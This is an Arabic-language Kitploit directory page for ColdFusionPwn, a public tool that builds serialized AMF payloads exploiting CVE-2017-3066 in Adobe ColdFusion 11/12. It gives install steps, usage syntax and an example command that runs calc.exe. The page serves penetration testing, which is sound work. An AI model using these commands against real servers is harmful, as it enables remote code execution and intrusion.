Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
ColdFusionPwn — أداة استغلال لـ CVE-2017-3066 تستهدف Adobe Coldfusion 11/12 | Kitploit
أدوات/GitHubGitHub/codewhitesec/coldfusionpwn
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراق
GitHubcodewhitesec/coldfusionpwn

ColdFusionPwn

أداة استغلال لـ CVE-2017-3066 تستهدف Adobe Coldfusion 11/12

عرض المستودع
9529منذ 3 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

ColdFusionPwn

أداة استغلال لـ CVE-2017-3066 تستهدف Adobe Coldfusion 11/12.

الوصف

تتيح لك الأداة إنشاء حمولات AMF مسلسلة لاستغلال التحقق المفقود من صحة الإدخال للفئات المسموح بها. للتفاصيل، راجع منشور المدونة الخاص بنا.

التثبيت

احصل على أحدث إصدار من ysoserial. احصل على ColdFusionPwn من الإصدارات.

الاستخدام

root@kitploit:~
java -cp ColdFusionPwn-0.0.1-SNAPSHOT-all.jar:ysoserial-master-SNAPSHOT.jar com.codewhitesec.coldfusionpwn.ColdFusionPwner [-s|-e] [payload type] '[command]' [outfile]
root@kitploit:~
- [-s|-e]         Setter (CF11) or Externalizable Exploit (CF11/12) technique
- [payload type]  ysoserial gadget payload 
- [command]       command to be executed
- [outfile]       output file for the generated payload

يجب أن يكون ColdFusionPwn-0.0.1-SNAPSHOT-all.jar هو الإدخال الأول في مسار الفئات (classpath)، لأن مكتبة ApacheCommons BeanUtils المرفقة مع ysoserial أحدث (ولدها معرّف تسلسل مختلف).

أمثلة

root@kitploit:~
java -cp ColdFusionPwn-0.0.1-SNAPSHOT-all.jar:ysoserial-master-SNAPSHOT.jar com.codewhitesec.coldfusionpwn.ColdFusionPwner -e CommonsBeanutils1 calc.exe /tmp/out.amf
تنزيل الأداة